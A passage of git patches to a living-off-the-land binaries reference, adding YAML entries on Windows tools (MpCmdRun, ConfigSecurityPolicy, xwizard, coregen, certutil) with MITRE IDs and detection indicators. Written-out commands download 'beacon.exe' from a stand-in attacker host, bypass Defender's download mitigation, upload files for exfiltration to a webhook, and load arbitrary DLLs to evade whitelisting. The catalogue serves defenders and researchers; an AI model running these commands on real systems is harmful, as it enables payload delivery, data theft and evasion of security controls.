'09/03/2020' Commands: - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe - Note: Slashes work as command line argument seperators /Downloadfile, /url, /path, as well as mixing dash and slash - Description: Download file to specified path + Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) Usecase: Download file Category: Download Privileges: User @@ -43,4 +42,6 @@ Acknowledgement: Handle: '@mohammadaskar2' - Person: Oddvar Moe Handle: '@oddvarmoe' + - Person: RichRumble + Handle: '' --- From 6a5af9a71c62d37cfab07f4c63ff9981732a613a Mon Sep 17 00:00:00 2001 From: unload Date: Fri, 4 Sep 2020 07:54:44 -0300 Subject: [PATCH 81/96] Create ConfigSecurityPolicy.yml --- yml/OSBinaries/ConfigSecurityPolicy.yml | 31 +++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 yml/OSBinaries/ConfigSecurityPolicy.yml diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml new file mode 100644 index 0000000..772dddb --- /dev/null +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -0,0 +1,31 @@ +--- +Name: ConfigSecurityPolicy.exe +Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. +Author: 'Ialle Teixeira' +Created: '04/09/2020' +Commands: + - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + MitreLink: https://attack.mitre.org/techniques/T1567/ + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe +Code_Sample: + - Code: +Detection: + - IOC: ConfigSecurityPolicy storing data into alternate data streams. + - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. + - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. + - IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" +Resources: + - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads + - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads + - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor +Acknowledgement: + - Person: Ialle Teixeira + Handle: '@NtSetDefault' +--- From 11aa1e503b6655850286b1ba83af0adda904ebfc Mon Sep 17 00:00:00 2001 From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Wed, 16 Sep 2020 16:34:47 +0000 Subject: [PATCH 82/96] Update Xwizard.yml This lolbin has functionality which allows downloading of files from the internet as well as previously outlined execution functionality. --- yml/OSBinaries/Xwizard.yml | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index f5afcee..5d95a19 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -20,6 +20,14 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM + Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe @@ -32,6 +40,7 @@ Resources: - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ + - Link: https://twitter.com/notwhickey/status/1306023056847110144 Acknowledgement: - Person: Adam Handle: '@Hexacorn' @@ -39,4 +48,6 @@ Acknowledgement: Handle: '@NickTyrer' - Person: harr0ey Handle: '@harr0ey' + - Person: Wade Hickey + Handle: '@notwhickey' --- From 13026a481be90843f09592a210aa63ab8f56d443 Mon Sep 17 00:00:00 2001 From: "Cochin, Cedric" Date: Thu, 24 Sep 2020 14:09:58 -0700 Subject: [PATCH 83/96] Update MpCmdRun.yml DownloadFile option has been removed from current MpCmdRun.exe, but old binary remains on disk. Defender cmd line mitigation can be bypassed by simply renaming the binary in a folder controlled by the attacker --- yml/OSBinaries/MpCmdRun.yml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 160c771..57da8bd 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -12,6 +12,14 @@ Commands: MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows 10 + - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe + Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation] + Usecase: Download file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe Description: Download file to machine and store it in Alternate Data Stream Usecase: Hide downloaded data inton an Alternate Data Stream @@ -44,4 +52,6 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: RichRumble Handle: '' ---- + - Person: Cedric + Handle: '@th3c3dr1c' +--- \ No newline at end of file From a45d4ca25cf71578dab0ae9d5ccc827c30157f9f Mon Sep 17 00:00:00 2001 From: checkymander <26147220+checkymander@users.noreply.github.com> Date: Thu, 1 Oct 2020 22:37:00 -0400 Subject: [PATCH 84/96] Create DefaultPack.yml Added DefaultPack.EXE LOLBin --- yml/OtherMSBinaries/DefaultPack.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OtherMSBinaries/DefaultPack.yml diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml new file mode 100644 index 0000000..acf7856 --- /dev/null +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -0,0 +1,26 @@ +--- +Name: DefaultPack.EXE +Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider. +Author: @checkymander +Created: '2020-10-01' +Commands: + - Command: DefaultPack.EXE /C:"process.exe args" + Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support. + Usecase: Can be used to execute stagers, binaries, and other malicious commands. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows +Full_Path: + - Path: C:\Program Files (x86)\Microsoft\DefaultPack\ +Code_Sample: + - Code: +Detection: + - IOC: DefaultPack.EXE spawned an unknown process +Resources: + - Link: https://twitter.com/checkymander/status/1311509470275604480. +Acknowledgement: + - Person: checkymander + Handle: @checkymander +--- From 22d9bbe92a6c6f4ed65890844120cdc69ea1e0fd Mon Sep 17 00:00:00 2001 From: Martin Date: Fri, 9 Oct 2020 17:10:49 +0200 Subject: [PATCH 85/96] Initial commit of Coregen.yml --- yml/OtherMSBinaries/Coregen.yml | 52 +++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 yml/OtherMSBinaries/Coregen.yml diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml new file mode 100644 index 0000000..2f29394 --- /dev/null +++ b/yml/OtherMSBinaries/Coregen.yml @@ -0,0 +1,52 @@ +--- +Name: coregen.exe +Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregin is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight. +Author: Martin Sohn Christensen +Created: 2020-10-09 +Commands: + - Command: coregon.exe.exe /L C:\folder\evil.dll dummy_assembly_name + Description: Loads the target .DLL in arbitrary path specified with /L. + Usecase: Execute DLL code + Category: Execute + Privileges: User + MitreID: T1055 + MitreLink: https://attack.mitre.org/wiki/Technique/T1055 + OperatingSystem: Windows + - Command: coregen.exe dummy_assembly_name + Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0). + Usecase: Execute DLL code + Category: Execute + Privileges: User + MitreID: T1055 + MitreLink: https://attack.mitre.org/wiki/Technique/T1055 + OperatingSystem: Windows + - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name + Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions. + Usecase: Execute DLL code + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows +Full_Path: + - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe + - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe +Code_Sample: + - Code: +Detection: + - IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" + - IOC: coregen.exe loading .dll file not named coreclr.dll + - IOC: coregen.exe command line containing -L or -l + - IOC: coregen.exe command line containing unexpected/invald assembly name + - IOC: coregen.exe application crash by invalid assembly name +Resources: + - Link: https://www.youtube.com/watch?v=75XImxOOInU + - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html +Acknowledgement: + - Person: Nicky Tyrer + Handle: + - Person: Evan Pena + Handle: + - Person: Casey Erikson + Handle: +--- \ No newline at end of file From 47c03c97b89376da0094c4c585aace0522e8a257 Mon Sep 17 00:00:00 2001 From: Martin Date: Sat, 10 Oct 2020 19:54:50 +0000 Subject: [PATCH 86/96] Typo --- yml/OtherMSBinaries/Coregen.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index 2f29394..91324cb 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -1,6 +1,6 @@ --- Name: coregen.exe -Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregin is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight. +Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight. Author: Martin Sohn Christensen Created: 2020-10-09 Commands: @@ -49,4 +49,4 @@ Acknowledgement: Handle: - Person: Casey Erikson Handle: ---- \ No newline at end of file +--- From 651e156583ebe2edc1779aec0d8a3d960a8ea5a9 Mon Sep 17 00:00:00 2001 From: "@dtmsecurity" Date: Mon, 12 Oct 2020 19:24:45 +0100 Subject: [PATCH 87/96] Create Wuauclt.yml --- yml/OSBinaries/Wuauclt.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OSBinaries/Wuauclt.yml diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml new file mode 100644 index 0000000..ba02158 --- /dev/null +++ b/yml/OSBinaries/Wuauclt.yml @@ -0,0 +1,26 @@ +--- +Name: wuauclt.exe +Description: Windows Update Client +Author: 'David Middlehurst' +Created: '2020-09-23' +Commands: + - Command: wuauclt.exe /UpdateDeploymentProvider /RunHandlerComServer + Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach. + Usecase: Execute dll via attach/detach methods + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\wuauclt.exe +Code_Sample: +- Code: +Detection: + - IOC: wuauclt run with a parameter of a DLL path +Resources: + - Link: https://dtm.uk/wuauclt/ +Acknowledgement: + - Person: David Middlehurst + Handle: '@dtmsecurity' +--- From ab6d42ddcf44c24cc55d4ff16ced0d01ee8ffd23 Mon Sep 17 00:00:00 2001 From: leo1-1 <61551576+leo1-1@users.noreply.github.com> Date: Wed, 14 Oct 2020 21:10:19 +0300 Subject: [PATCH 88/96] added command to certutil --- certutil.yml.txt | 76 ++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 certutil.yml.txt diff --git a/certutil.yml.txt b/certutil.yml.txt new file mode 100644 index 0000000..b1aa789 --- /dev/null +++ b/certutil.yml.txt @@ -0,0 +1,76 @@ +--- +Name: Certutil.exe +Description: Windows binary used for handeling certificates +Author: 'Oddvar Moe' +Created: '2018-05-25' +Commands: + - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe + Description: Download and save 7zip to disk in the current folder. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe + Description: Download and save 7zip to disk in the current folder. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt + Description: Download and save a PS1 file to an Alternate Data Stream (ADS). + Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream + Category: ADS + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/techniques/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil -encode inputFileName encodedOutputFileName + Description: Command to encode a file using Base64 + Usecase: Encode files to evade defensive measures + Category: Encode + Privileges: User + MitreID: T1027 + MitreLink: https://attack.mitre.org/wiki/Technique/T1027 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil -decode encodedInputFileName decodedOutputFileName + Description: Command to decode a Base64 encoded file. + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + MitreLink: https://attack.mitre.org/wiki/Technique/T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil --decodehex encoded_hexadecimal_InputFileName + Description: Command to decode a hexadecimal-encoded file decodedOutputFileName + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + MitreLink: https://attack.mitre.org/wiki/Technique/T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\certutil.exe + - Path: C:\Windows\SysWOW64\certutil.exe +Code_Sample: + - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file) +Detection: + - IOC: Certutil.exe creating new files on disk + - IOC: Useragent Microsoft-CryptoAPI/10.0 + - IOC: Useragent CertUtil URL Agent +Resources: + - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 + - Link: https://twitter.com/mattifestation/status/620107926288515072 + - Link: https://twitter.com/egre55/status/1087685529016193025 +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Moriarty + Handle: '@Moriarty_Meng' + - Person: egre55 + Handle: '@egre55' + - Person: Lior Adar +--- \ No newline at end of file From 9a6309d8defe544b1cdd97c6d0d3b713b7c70ae4 Mon Sep 17 00:00:00 2001 From: Conor Richard Date: Thu, 22 Oct 2020 20:38:50 -0400 Subject: [PATCH 89/96] Update ConfigSecurityPolicy.yml Added link to Tweet from author containing an example usage. --- yml/OSBinaries/ConfigSecurityPolicy.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index 772dddb..0abab90 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -25,6 +25,7 @@ Resources: - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor + - Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20 Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' From de169664d6da5a03cc055358a00360bb33f46bce Mon Sep 17 00:00:00 2001 From: xenoscr Date: Thu, 22 Oct 2020 21:51:57 -0400 Subject: [PATCH 90/96] Finxing missing quotes --- yml/OtherMSBinaries/DefaultPack.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index acf7856..dbea4fd 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -1,7 +1,7 @@ --- Name: DefaultPack.EXE Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider. -Author: @checkymander +Author: '@checkymander' Created: '2020-10-01' Commands: - Command: DefaultPack.EXE /C:"process.exe args" @@ -22,5 +22,5 @@ Resources: - Link: https://twitter.com/checkymander/status/1311509470275604480. Acknowledgement: - Person: checkymander - Handle: @checkymander + Handle: '@checkymander' --- From 04c0e7ee38bb7f4780074007379b3b14427bdb02 Mon Sep 17 00:00:00 2001 From: Conor Richard Date: Thu, 22 Oct 2020 22:00:05 -0400 Subject: [PATCH 91/96] Update Explorer.yml Fixing alignment in Acknowledgement section --- yml/OSBinaries/Explorer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 336f44b..5b65019 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -34,6 +34,6 @@ Resources: Acknowledgement: - Person: Jai Minton Handle: '@CyberRaiju' - - Person: Jimmy + - Person: Jimmy Handle: '@bohops' --- From 9b60a844a2e55b797c03cd9af28dc65fb1140cae Mon Sep 17 00:00:00 2001 From: leo1-1 <61551576+leo1-1@users.noreply.github.com> Date: Sun, 25 Oct 2020 09:03:39 +0200 Subject: [PATCH 92/96] Rename certutil.yml.txt to certutil.yml changed --- certutil.yml.txt => certutil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename certutil.yml.txt => certutil.yml (97%) diff --git a/certutil.yml.txt b/certutil.yml similarity index 97% rename from certutil.yml.txt rename to certutil.yml index b1aa789..46408ae 100644 --- a/certutil.yml.txt +++ b/certutil.yml @@ -73,4 +73,4 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Lior Adar ---- \ No newline at end of file +--- From 2166960d4edcfdc3b8b9189fab1559f1f6bd6463 Mon Sep 17 00:00:00 2001 From: leo1-1 <61551576+leo1-1@users.noreply.github.com> Date: Mon, 26 Oct 2020 08:22:58 +0200 Subject: [PATCH 93/96] changed path --- certutil.yml => yml/OSBinaries/certutil.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename certutil.yml => yml/OSBinaries/certutil.yml (100%) diff --git a/certutil.yml b/yml/OSBinaries/certutil.yml similarity index 100% rename from certutil.yml rename to yml/OSBinaries/certutil.yml From 76d79ea4791709f52b1348e25c174571a4bd63c8 Mon Sep 17 00:00:00 2001 From: leo1-1 <61551576+leo1-1@users.noreply.github.com> Date: Mon, 26 Oct 2020 08:57:42 +0200 Subject: [PATCH 94/96] Update Certutil --- yml/OSBinaries/Certutil.yml | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index db1e9a8..83afab2 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -44,11 +44,19 @@ Commands: MitreID: T1140 MitreLink: https://attack.mitre.org/wiki/Technique/T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil --decodehex encoded_hexadecimal_InputFileName + Description: Command to decode a hexadecimal-encoded file decodedOutputFileName + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + MitreLink: https://attack.mitre.org/wiki/Technique/T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe Code_Sample: - - Code: + - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file) Detection: - IOC: Certutil.exe creating new files on disk - IOC: Useragent Microsoft-CryptoAPI/10.0 @@ -64,4 +72,5 @@ Acknowledgement: Handle: '@Moriarty_Meng' - Person: egre55 Handle: '@egre55' + - Person: Lior Adar --- From 64d5dffc4b337424d1c10bbce7c1d327253a508e Mon Sep 17 00:00:00 2001 From: leo1-1 <61551576+leo1-1@users.noreply.github.com> Date: Mon, 26 Oct 2020 08:59:00 +0200 Subject: [PATCH 95/96] Delete certutil.yml --- yml/OSBinaries/certutil.yml | 76 ------------------------------------- 1 file changed, 76 deletions(-) delete mode 100644 yml/OSBinaries/certutil.yml diff --git a/yml/OSBinaries/certutil.yml b/yml/OSBinaries/certutil.yml deleted file mode 100644 index 46408ae..0000000 --- a/yml/OSBinaries/certutil.yml +++ /dev/null @@ -1,76 +0,0 @@ ---- -Name: Certutil.exe -Description: Windows binary used for handeling certificates -Author: 'Oddvar Moe' -Created: '2018-05-25' -Commands: - - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - MitreLink: https://attack.mitre.org/wiki/Technique/T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Description: Download and save 7zip to disk in the current folder. - Usecase: Download file from Internet - Category: Download - Privileges: User - MitreID: T1105 - MitreLink: https://attack.mitre.org/wiki/Technique/T1105 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt - Description: Download and save a PS1 file to an Alternate Data Stream (ADS). - Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream - Category: ADS - Privileges: User - MitreID: T1096 - MitreLink: https://attack.mitre.org/techniques/T1096 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil -encode inputFileName encodedOutputFileName - Description: Command to encode a file using Base64 - Usecase: Encode files to evade defensive measures - Category: Encode - Privileges: User - MitreID: T1027 - MitreLink: https://attack.mitre.org/wiki/Technique/T1027 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil -decode encodedInputFileName decodedOutputFileName - Description: Command to decode a Base64 encoded file. - Usecase: Decode files to evade defensive measures - Category: Decode - Privileges: User - MitreID: T1140 - MitreLink: https://attack.mitre.org/wiki/Technique/T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil --decodehex encoded_hexadecimal_InputFileName - Description: Command to decode a hexadecimal-encoded file decodedOutputFileName - Usecase: Decode files to evade defensive measures - Category: Decode - Privileges: User - MitreID: T1140 - MitreLink: https://attack.mitre.org/wiki/Technique/T1140 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 -Full_Path: - - Path: C:\Windows\System32\certutil.exe - - Path: C:\Windows\SysWOW64\certutil.exe -Code_Sample: - - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file) -Detection: - - IOC: Certutil.exe creating new files on disk - - IOC: Useragent Microsoft-CryptoAPI/10.0 - - IOC: Useragent CertUtil URL Agent -Resources: - - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 - - Link: https://twitter.com/mattifestation/status/620107926288515072 - - Link: https://twitter.com/egre55/status/1087685529016193025 -Acknowledgement: - - Person: Matt Graeber - Handle: '@mattifestation' - - Person: Moriarty - Handle: '@Moriarty_Meng' - - Person: egre55 - Handle: '@egre55' - - Person: Lior Adar ---- From 5806d33e7066cd1e73b32baee75d5fc5e1ee30ea Mon Sep 17 00:00:00 2001 From: Conor Richard Date: Mon, 26 Oct 2020 19:43:55 -0400 Subject: [PATCH 96/96] Update Certutil.yml --- yml/OSBinaries/Certutil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 83afab2..c58c55d 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -56,7 +56,7 @@ Full_Path: - Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe Code_Sample: - - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file) + - Code: Detection: - IOC: Certutil.exe creating new files on disk - IOC: Useragent Microsoft-CryptoAPI/10.0